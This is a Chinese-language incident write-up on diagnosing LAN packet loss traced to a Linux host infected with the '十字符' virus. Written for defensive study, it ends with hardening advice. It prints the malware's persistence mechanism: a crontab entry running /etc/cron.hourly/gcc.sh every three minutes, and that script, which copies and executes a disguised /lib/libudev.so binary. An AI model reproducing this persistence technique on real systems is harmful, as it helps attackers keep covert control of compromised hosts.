记一次Linux系统被入侵的过程

记一次Linux系统被入侵的过程

1. 前期现象

前期现象，宋组那边反应开发环境192.161.14.98这台机器通过公网下载文件，很慢，ping百度丢包严重。因为这台机器是通过楼下adsl拨号上网，于是连上去ping该网段网关(192.168.3.1)，发现内网都丢包。

2.问题排查

2.1前期排查

2.1.1排查是不是14.98这台机器的问题

为排查是不是192.161.14.98这台机器的问题，通过发现抓包发现。Arp包、和广播包都比较比较多，考虑到是不是DOS攻击，然后在登录adsl开启ICMP泛洪、SYN泛洪、ARP攻击相关策略，重启adsl。在14.98这台机器上，ping 网关192.168.3.1，发现过一会儿丢包依然存在。为排除是不是14.98这台机器的问题，选择stage环境6.21这台机（该机器也是通过adsl上网的有一个192.168.3.0网段的IP）做测试，通过这台机器ping网关（192.168.3.1），发现丢包依然存在。

2.1.2排查可能不是14.98这台机器的问题

于是，就考虑到可能不是14.98这台机器的问题,考虑可能是通过adsl上网下载的机器占用带宽的问题（因为这个问题，在以前也遇到过，通过改内网网段，问题就解决了。）于是将192.168.3.0/24改成192.168.2.0/24，并修改了14.98和stage6.21这台机器的相应的能够上公网的ip。发现丢包现象停止。基本确认是有机器占用带宽导致这次问题。

2.2中期排查

为排除以后在出现此问题，影响工作。决定绑定主机mac地址，限制p2p流量，便于以后快速定位问题。

2.2.1开启dhcp服务器，定位通过adsl上网的主机都是哪些IP哪些mac地址，并配置mac过滤策略。如下图所示

2.2.2通过逐一排查定位主机

在切换策略的时候，定位到14.158这台机器有重大嫌疑。如果允许该主机上外网，丢包现象存在，如果限制该主机上网，丢包现象消失。

2.3后期排查

2.3.1通过抓包发现该主机arp包、广播包太多说明可能存在问题

2.3.2top命令查看异常进程

2.3.3查看该异常的连接

当时忘截图了，发现该进程的一个端口有一个法国IP连接存于established状态。

2.3.4查看该进程执行文件

2.3.4杀死该进程断网

发现该进程有死尔复生的功能，但是断网之后对网络带宽影响消失。断定可能本机有定时任务。

2.3.5排查定时任务

[root@www ~]# cat /etc/crontab

SHELL=/bin/bash

PATH=/sbin:/bin:/usr/sbin:/usr/bin

MAILTO=root

HOME=/

# For details see man 4 crontabs

# Example of job definition:

# .---------------- minute (0 - 59)

# |  .------------- hour (0 - 23)

# |  |  .---------- day of month (1 - 31)

# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...

# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat

# |  |  |  |  |

# *  *  *  *  * user-name command to be executed

*/3 * * * * root /etc/cron.hourly/gcc.sh

2.3.6定位循环执行的病毒体

[root@www ~]# cat  /etc/cron.hourly/gcc.sh

#!/bin/sh

PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin

for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done

cp /lib/libudev.so /lib/libudev.so.6

/lib/libudev.so.6

通过百度查出此病毒为臭名昭著的“十字符病毒”

2.3.7十字符病毒详解及其处理办法

请参考下面链接http://blog.csdn.net/fgf00/article/details/51388422

2.3.8查看病毒体源码

3.追踪被黑的原因

3.1查看最近登录本台机器的未能看到近期成功登录本机的记录怀疑已被抹除痕迹

3.2怀疑当初官网测试的时候，由于root密码太弱被暴力破解，注入此病毒。

3.3具体原因还需进一步研究。

4.造成危害

占用系统资源和占用带宽，导致局域网丢包严重。

5.解决办法

5.1杀死病毒请参考如下链接

http://blog.csdn.net/fgf00/article/details/51388422

5.2防范措施

5.2.1禁用root直接登录

5.2.2设置登录错误次数限定

5.2.3安装prtg软件，监控异常流量，便于快速定位问题